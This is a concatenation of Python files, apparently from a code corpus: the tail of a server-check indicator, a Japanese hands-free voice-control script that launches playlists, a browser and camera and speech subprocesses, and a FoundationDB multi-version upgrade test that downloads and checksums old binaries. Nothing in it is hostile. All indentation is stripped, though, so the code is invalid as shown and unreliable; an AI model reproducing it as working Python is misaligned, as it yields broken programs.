self.refresh_item.set_sensitive(False)
return True
if __name__ == "__main__":
indicator = CheckServers()
indicator.main()
# vim: autoindent tabstop=4 shiftwidth=4 expandtab:
|
_handfree_control.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import queue
import threading
import subprocess
import datetime
import time
import codecs
import requests as web
import bs4
import urllib.parse
def v_output(txt):
playFile='temp/temp_playSJIS.txt'
while os.path.exists(playFile):
time.sleep(0.1)
try:
w = codecs.open(playFile, 'w', 'shift_jis')
w.write(txt)
w.close()
w = None
except:
w = None
try:
w2 = open(playFile, 'w')
w2.write(txt)
w2.close()
w2 = None
except:
w2 = None
#print('v_output__: ' + txt)
def v_micon():
micON ='temp/temp_micON.txt'
print('v_micoff:microphone turn on')
while not os.path.exists(micON):
try:
w = open(micON, 'w')
w.write('ON')
w.close()
w = None
except:
w = None
def v_micoff():
micON ='temp/temp_micON.txt'
print('v_micon_:microphone turn off')
if os.path.exists(micON):
try:
os.remove(micON)
except:
pass
def sub_extpgm(cn_r,cn_s):
print('extpgm__:init')
runmode = cn_r.get()
camdev = cn_r.get()
cn_r.task_done()
print('extpgm__:runmode=' + str(runmode))
print('extpgm__:camdev =' + str(camdev ))
print('extpgm__:start')
playlist = None
browser = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('extpgm__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
print('speech__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if mode_get != 'RUN':
cn_s.put(['PASS', ''])
else:
if camdev == 'None':
recText1='temp/temp_recSJIS.txt'
recText2='temp/temp_bakSJIS.txt'
recTran1='temp/temp_recTranslator.txt'
recTran2='temp/temp_bakTranslator.txt'
else:
recText1='temp/temp_bakSJIS.txt'
recText2='temp/temp_oldSJIS.txt'
recTran1='temp/temp_bakTranslator.txt'
recTran2='temp/temp_oldTranslator.txt'
if os.path.exists(recText1):
if os.path.exists(recText2):
try:
os.remove(recText2)
except:
pass
if os.path.exists(recTran1):
if os.path.exists(recTran2):
try:
os.remove(recTran2)
except:
pass
hit_text = ''
hit_tran = ''
play_cmd = ''
browser_cmd = ''
if os.path.exists(recText1):
if os.path.exists(recTran1):
if not os.path.exists(recTran2):
try:
os.rename(recTran1, recTran2)
txt = ''
rt = codecs.open(recTran2, 'r', 'utf-8')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
rt.close
rt = None
hit_tran = txt
except:
rt = None
if not os.path.exists(recText2):
try:
os.rename(recText1, recText2)
txt = ''
rt = codecs.open(recText2, 'r', 'shift_jis')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
rt.close
rt = None
hit_text = txt
except:
rt = None
japanese = hit_text.lower()
english = hit_tran.lower()
if english != '':
if english == 'playlist 00' or english == 'playlist 0' \
or english == 'bgm' or english == 'garageband':
play_cmd = '_handfree_playlist_00.bat'
elif english == 'playlist 01' or english == 'playlist 1' \
or english == 'playlist etc' or english == 'playlists etc':
play_cmd = '_handfree_playlist_01.bat'
elif english == 'playlist 02' or english == 'playlist 2' \
or english == 'babymetal':
play_cmd = '_handfree_playlist_02.bat'
elif english == 'playlist 03' or english == 'playlist 3' \
or english == 'perfume':
play_cmd = '_handfree_playlist_03.bat'
elif english == 'playlist 04' or english == 'playlist 4' \
or english == 'kyary pamyu pamyu':
play_cmd = '_handfree_playlist_04.bat'
elif english == 'playlist 05' or english == 'playlist 5' \
or english == 'one ok rock' or english == 'one ok':
play_cmd = '_handfree_playlist_05.bat'
elif english == 'playlist 06' or english == 'playlist 6' \
or english == 'end of the world':
play_cmd = '_handfree_playlist_06.bat'
elif english == 'end playlist' or english == 'end of bgm' \
or english == 'close playlist' or english == 'close bgm':
play_cmd = '_close_'
elif english == 'browser':
browser_cmd = '_open_'
elif english == 'end browser' or english == 'close browser' \
or english == 'browser exit':
browser_cmd = '_close_'
elif english == 'reset':
play_cmd = '_close_'
browser_cmd = '_close_'
if play_cmd == '_close_' or play_cmd != '':
playlist = subprocess.Popen(['_handfree_control_kill.bat'])
playlist.wait(2000)
playlist.terminate()
playlist = None
time.sleep(1)
if play_cmd != '':
if os.path.exists(play_cmd):
playlist = subprocess.Popen([play_cmd])
if browser_cmd == '_open_':
if browser is None:
urlx = 'https://www.google.co.jp/'
browser = subprocess.Popen(['_handfree_web_open.bat', urlx])
if browser_cmd == '_close_':
browser = subprocess.Popen(['_handfree_web_kill.bat'])
browser.wait(2000)
browser.terminate()
browser = None
if not browser is None:
if browser_cmd == '' and play_cmd == '' and japanese != '':
url = ''
title = ''
text = ''
if url == '':
if english[:9] == 'periscope':
url = 'https://www.pscp.tv/'
if url == '':
try:
# キーワードを使って検索する
list_keywd = [japanese]
resp = web.get('https://www.google.co.jp/search?num=10&q=' + ' '.join(list_keywd))
resp.raise_for_status()
# 取得したHTMLをパースする
soup = bs4.BeautifulSoup(resp.text, "html.parser")
link_elem01 = soup.select('.r > a')
link_elem02 = soup.select('.s > .st')
title = link_elem01[0].get_text()
title = urllib.parse.unquote(title)
text = link_elem01[0].get_text()
text = urllib.parse.unquote(text)
text = text.replace('\n', '')
url = link_elem01[0].get('href')
url = url.replace('/url?q=', '')
if url.find('&sa=') >= 0:
url = url[:url.find('&sa=')]
url = urllib.parse.unquote(url)
url = urllib.parse.unquote(url)
#print(title)
#print(text)
#print(url)
except:
pass
#browser = subprocess.Popen(['_handfree_web_kill.bat'])
#browser.wait(2000)
#browser.terminate()
#browser = None
if url != '':
print(url)
browser = subprocess.Popen(['_handfree_web_open.bat', url])
else:
browser = subprocess.Popen(['_handfree_web_open.bat', japanese])
if not playlist is None:
try:
playlist.wait(0.1)
playlist = None
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('extpgm__:terminate')
playlist = subprocess.Popen(['_handfree_control_kill.bat'])
playlist.wait(2000)
if not playlist is None:
playlist.terminate()
playlist = None
browser = subprocess.Popen(['_handfree_web_kill.bat'])
browser.wait(2000)
if not browser is None:
browser.terminate()
browser = None
print('extpgm__:end')
def sub_vision(cn_r,cn_s):
print('vision__:init')
runmode = cn_r.get()
camdev = cn_r.get()
camrote = cn_r.get()
cn_r.task_done()
print('vision__:runmode=' + str(runmode))
print('vision__:camdev =' + str(camdev ))
print('vision__:camrote=' + str(camrote))
print('vision__:start')
vision = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('vision__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
print('vision__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if vision is None:
if camdev != 'None':
if runmode == 'translator':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'cars.xml', 'fullbody.xml', 'None', '3600'])
elif runmode == 'learning':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'cars.xml', 'fullbody.xml', 'None', '3600'])
elif runmode == 'reception':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'640', 'face.xml', 'fullbody.xml', 'azure_capture_face.bat', '120'])
elif runmode == 'camera':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'None', 'None', 'None', '120'])
else:
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'640', 'None', 'None', 'None', '0'])
if not vision is None:
try:
vision.wait(0.1)
vision = None
try:
camResult = 'temp/temp_camResult.txt'
if os.path.exists(camResult):
rt = codecs.open(camResult, 'r', 'utf-8')
txt = ''
for t in rt:
txt = (txt + ' ' + str(t)).strip()
rt.close
rt = None
cn_s.put(['END', ''])
break
except:
pass
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('vision__:terminate')
if not vision is None:
vision.terminate()
vision = None
print('vision__:end')
def sub_speech(cn_r,cn_s):
print('speech__:init')
runmode = cn_r.get()
micdev = cn_r.get()
mictype = cn_r.get()
miclevel= cn_r.get()
micguide= cn_r.get()
api = cn_r.get()
cn_r.task_done()
print('speech__:runmode =' + str(runmode ))
print('speech__:micdev =' + str(micdev ))
print('speech__:mictype =' + str(mictype ))
print('speech__:miclevel=' + str(miclevel))
print('speech__:micguide=' + str(micguide))
print('speech__:api =' + str(api ))
print('speech__:start')
speech = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('speech__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
print('speech__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if speech is None:
if micdev != 'None':
if runmode == 'translator':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', runmode, \
'temp/temp_micON.txt', 'Default', 'None'])
elif runmode == 'learning':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', runmode, \
'temp/temp_micON.txt', 'Default', 'None'])
elif runmode == 'reception':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'ja', 'ja', 'speech', \
'temp/temp_micON.txt', 'Default', 'azure_speech_id.bat'])
elif runmode == 'camera':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'ja', 'ja', 'speech', \
'None', 'Default', 'None'])
else:
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', 'translator', \
'None', 'Default', 'None'])
if not speech is None:
try:
speech.wait(0.1)
speech = None
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('speech__:terminate')
if not speech is None:
speech.terminate()
speech = None
print('speech__:end')
if __name__ == '__main__':
print('handfree:init')
print('handfree:exsample.py runmode, camdev, camrote, micdev, api,')
runmode = 'translator'
camdev = '0'
camrote = '0'
micdev = '0'
mictype = 'bluetooth'
miclevel= '1555'
micguide= 'on'
api = 'free'
if len(sys.argv)>=2:
runmode = sys.argv[1]
if len(sys.argv)>=3:
camdev = sys.argv[2]
if len(sys.argv)>=4:
camrote = sys.argv[3]
if len(sys.argv)>=5:
micdev = sys.argv[4]
if len(sys.argv)>=6:
mictype = sys.argv[5]
if len(sys.argv)>=7:
miclevel= sys.argv[6]
if len(sys.argv)>=8:
micguide= sys.argv[7]
if len(sys.argv)>=9:
api = sys.argv[8]
print('')
print('handfree:runmode =' + str(runmode ))
print('handfree:camdev =' + str(camdev ))
print('handfree:camrote =' + str(camrote ))
print('handfree:micdev =' + str(micdev ))
print('handfree:mictype =' + str(mictype ))
print('handfree:miclevel=' + str(miclevel))
print('handfree:micguide=' + str(micguide))
print('handfree:api =' + str(api ))
v_micoff()
print('')
print('handfree:start')
main_start = time.time()
vision_s = queue.Queue()
vision_r = queue.Queue()
vision_proc = None
vision_beat = 0
vision_skip = 0
speech_s = queue.Queue()
speech_r = queue.Queue()
speech_proc = None
speech_beat = 0
speech_skip = 0
extpgm_s = queue.Queue()
extpgm_r = queue.Queue()
extpgm_proc = None
extpgm_beat = 0
extpgm_skip = 0
onece = True
while True:
# Thread timeout check
if (vision_r.qsize() == 0) and (vision_beat != 0):
sec = int(time.time() - vision_beat)
if sec > 60:
print('handsfree_:vision_proc 60s')
#vision_beat = time.time()
print('handfree:vision_proc break')
vision_s.put([None, None])
time.sleep(3.0)
vision_proc = None
vision_beat = 0
vision_skip = 0
if (speech_r.qsize() == 0) and (speech_beat != 0):
sec = int(time.time() - speech_beat)
if sec > 60:
print('handfree:speech_proc 60s')
#speech_beat = time.time()
print('handfree:speech_proc break')
speech_s.put([None, None])
time.sleep(3.0)
speech_proc = None
speech_beat = 0
speech_skip = 0
if (extpgm_r.qsize() == 0) and (extpgm_beat != 0):
sec = int(time.time() - extpgm_beat)
if sec > 60:
print('handfree:extpgm_proc 60s')
#extpgm_beat = time.time()
print('handfree:extpgm_proc break')
extpgm_s.put([None, None])
time.sleep(3.0)
extpgm_proc = None
extpgm_beat = 0
extpgm_skip = 0
# Thread start
if vision_proc is None:
while vision_s.qsize() > 0:
dummy = vision_s.get()
while vision_r.qsize() > 0:
dummy = vision_r.get()
vision_proc = threading.Thread(target=sub_vision, args=(vision_s,vision_r,))
vision_proc.daemon = True
vision_s.put(runmode)
vision_s.put(camdev )
vision_s.put(camrote)
vision_proc.start()
time.sleep(5.0)
vision_s.put(['START', ''])
vision_beat = time.time()
vision_skip = 0
if speech_proc is None:
while speech_s.qsize() > 0:
dummy = speech_s.get()
while speech_r.qsize() > 0:
dummy = speech_r.get()
speech_proc = threading.Thread(target=sub_speech, args=(speech_s,speech_r,))
speech_proc.daemon = True
speech_s.put(runmode )
speech_s.put(micdev )
speech_s.put(mictype )
speech_s.put(miclevel)
speech_s.put(micguide)
speech_s.put(api )
speech_proc.start()
time.sleep(5.0)
speech_s.put(['START', ''])
speech_beat = time.time()
speech_skip = 0
if extpgm_proc is None:
while extpgm_s.qsize() > 0:
dummy = extpgm_s.get()
while extpgm_r.qsize() > 0:
dummy = extpgm_r.get()
extpgm_proc = threading.Thread(target=sub_extpgm, args=(extpgm_s,extpgm_r,))
extpgm_proc.daemon = True
extpgm_s.put(runmode )
extpgm_s.put(camdev )
extpgm_proc.start()
time.sleep(5.0)
extpgm_s.put(['START', ''])
extpgm_beat = time.time()
extpgm_skip = 0
# processing
if vision_r.qsize() > 0:
vision_get = vision_r.get()
vision_res = vision_get[0]
vision_dat = vision_get[1]
vision_r.task_done()
if vision_res == 'END':
break
if vision_r.qsize() == 0 and vision_s.qsize() == 0:
vision_skip += 1
else:
vision_skip = 0
if vision_skip > 50:
vision_s.put(['RUN', ''])
vision_beat = time.time()
vision_skip = 0
if speech_r.qsize() > 0:
speech_get = speech_r.get()
speech_res = speech_get[0]
speech_dat = speech_get[1]
speech_r.task_done()
if speech_res == 'END':
break
if speech_r.qsize() == 0 and speech_s.qsize() == 0:
speech_skip += 1
else:
speech_skip = 0
if speech_skip > 50:
speech_s.put(['RUN', ''])
speech_beat = time.time()
speech_skip = 0
if extpgm_r.qsize() > 0:
extpgm_get = extpgm_r.get()
extpgm_res = extpgm_get[0]
extpgm_dat = extpgm_get[1]
extpgm_r.task_done()
if extpgm_res == 'END':
break
if extpgm_r.qsize() == 0 and extpgm_s.qsize() == 0:
extpgm_skip += 1
else:
extpgm_skip = 0
if extpgm_skip > 50:
extpgm_s.put(['RUN', ''])
extpgm_beat = time.time()
extpgm_skip = 0
if onece == True:
onece = False
if micdev != 'None':
if runmode == 'translator' or runmode == 'learning':
#v_output('This is a hands-free control systems,')
#v_output('First function is translation of multiple languages,')
#if runmode == 'learning':
# v_output('with speech feedback for studying japanese,')
#v_output('Second function is select music playlist 0 to 6,')
#v_output('Third function is voice control web browser,')
v_output('ハンズフリー音声制御システムが開始されました。')
v_output('第1機能として、複数言語に対応した音声翻訳ができます。')
if runmode == 'learning':
v_output('日本語学習できるように音声フィードバックも行います。')
v_output('第2機能として、音楽プレイリストのゼロから6を、再生できます。')
v_output('第3機能として、ウェブブラウザーを、音声制御できます。')
time.sleep(3.0)
v_micon()
time.sleep(0.01)
print('')
print('handfree:terminate')
vision_s.put([None, None])
speech_s.put([None, None])
extpgm_s.put([None, None])
vision_proc.join()
speech_proc.join()
extpgm_proc.join()
print('')
print('handfree:bye!')
|
upgrade_test.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = ["7.2.0", "7.1.1", "7.1.0", "7.0.0", "6.3.24", "6.3.23",
"6.3.22", "6.3.18", "6.3.17", "6.3.16", "6.3.15", "6.3.13", "6.3.12", "6.3.9", "6.2.30",
"6.2.29", "6.2.28", "6.2.27", "6.2.26", "6.2.25", "6.2.24", "6.2.23", "6.2.22", "6.2.21",
"6.2.20", "6.2.19", "6.2.18", "6.2.17", "6.2.16", "6.2.15", "6.2.10", "6.1.13", "6.1.12",
"6.1.11", "6.1.10", "6.0.18", "6.0.17", "6.0.16", "6.0.15", "6.0.14", "5.2.8", "5.2.7",
"5.1.7", "5.1.6"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
ver_tuple = version_from_str(ver_str)
return ver_tuple[0]*100+ver_tuple[1]*10
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
def random_sleep(minSec, maxSec):
timeSec = random.uniform(minSec, maxSec)
print("Sleeping for {0:.3f}s".format(timeSec))
time.sleep(timeSec)
def compute_sha256(filename):
hash = hashlib.sha256()
with open(filename, 'rb') as f:
while True:
data = f.read(128*1024)
if not data:
break
hash.update(data)
return hash.hexdigest()
def read_to_str(filename):
with open(filename, 'r') as f:
return f.read()
class UpgradeTest:
def __init__(self, build_dir: str, upgrade_path: list, process_number: int = 1, port: str = None):
self.build_dir = Path(build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(build_dir)
self.upgrade_path = upgrade_path
for version in upgrade_path:
assert version in SUPPORTED_VERSIONS, "Unsupported version {}".format(
version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform)
self.tmp_dir = self.build_dir.joinpath(
"tmp",
random_secret_string(16)
)
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath(
"tmp",
"old_binaries"
)
self.download_old_binaries()
self.create_external_lib_dir()
init_version = upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
process_number,
port=port,
create_config=False
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8)))
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8)))
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(self, version, target_bin_name, remote_bin_name, makeExecutable):
local_file = self.binary_path(version, target_bin_name)
if (local_file.exists()):
return
self.download_dir.joinpath(version).mkdir(
parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT,
version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS):
print("Downloading '{}' to '{}'...".format(remote_file, local_file))
request.urlretrieve(remote_file, local_file)
print("Downloading '{}' to '{}'...".format(
remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
assert local_file.exists(), "{} does not exist".format(local_file)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
actual_checkum = compute_sha256(local_file)
if (expected_checksum == actual_checkum):
print("Checksum OK")
break
print("Checksum mismatch. Expected: {} Actual: {}".format(
expected_checksum, actual_checkum))
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS-1:
assert False, "Failed to download {} after {} attempts".format(
local_file, MAX_DOWNLOAD_ATTEMPTS)
if makeExecutable:
make_executable(local_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.upgrade_path:
if version == CURRENT_VERSION:
continue
self.download_old_binary(version,
"fdbserver", "fdbserver.{}".format(self.platform), True)
self.download_old_binary(version,
"fdbmonitor", "fdbmonitor.{}".format(self.platform), True)
self.download_old_binary(version,
"fdbcli", "fdbcli.{}".format(self.platform), True)
self.download_old_binary(version,
"libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.upgrade_path:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version))
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if not "processes" in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if (num_proc < self.cluster.process_number):
print("Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number))
time.sleep(1)
continue
assert num_proc == self.cluster.process_number, "Number of processes: expected: {}, actual: {}".format(
self.cluster.process_number, num_proc)
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert proc_ver == self.cluster_version, "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(
version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if (version_before(version, "7.1.0")):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
def __exit__(self, xc_type, exc_value, traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.upgrade_path:
self.api_version = min(
api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [self.tester_bin,
'--cluster-file', self.cluster.cluster_file,
'--test-file', test_file,
'--external-client-dir', self.external_lib_dir,
'--disable-local-client',
'--input-pipe', self.input_pipe_path,
'--output-pipe', self.output_pipe_path,
'--api-version', str(self.api_version),
'--log',
'--log-dir', self.log,
'--tmp-dir', self.tmp_dir,
'--transaction-retry-limit', str(TRANSACTION_RETRY_LIMIT)]
if (RUN_WITH_GDB):
cmd_args = ['gdb', '-ex', 'run', '--args'] + cmd_args
print("Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])))
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if (self.tester_retcode != 0):
print("Tester failed with return code {}".format(
self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self, ctrl_pipe):
self.progress_event.clear()
os.write(ctrl_pipe, b"CHECK\n")
self.progress_event.wait(
None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if (self.progress_event.is_set()):
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, 'r')
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if (msg == "CHECK_OK"):
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check(ctrl_pipe)
for version in self.upgrade_path[1:]:
random_sleep(0.0, 2.0)
self.upgrade_to(version)
self.health_check()
self.progress_check(ctrl_pipe)
os.write(ctrl_pipe, b"STOP\n")
finally:
os.close(ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
except:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(
target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity,
self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
sev40s = (
subprocess.getoutput(
"grep -r 'Severity=\"40\"' {}".format(
self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false positives in some cases!"
):
continue
if (err_cnt < error_limit):
print(line)
err_cnt += 1
if err_cnt > 0:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails", err_cnt)
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
sev30s = (
subprocess.getoutput(
"grep -r 'Severity=\"30\"' {}".format(
self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
if (len(sev30s) == 0):
print("No warnings found in logs")
else:
print(">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)))
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
'--upgrade-path',
nargs='+',
help='Cluster upgrade path: a space separated list of versions',
default=[CURRENT_VERSION]
)
parser.add_argument(
'--test-file',
help='A .toml file describing a test workload to be generated with fdb_c_api_tester',
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
type=int,
default=0,
)
parser.add_argument(
'--disable-log-dump',
help='Do not dump cluster log on error',
action="store_true"
)
parser.add_argument(
'--run-with-gdb',
help='Execute the tester binary from gdb',
action="store_true"
)
args = parser.parse_args()
if (args.process_number == 0):
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
if (args.run_with_gdb):
RUN_WITH_GDB = True
errcode = 1
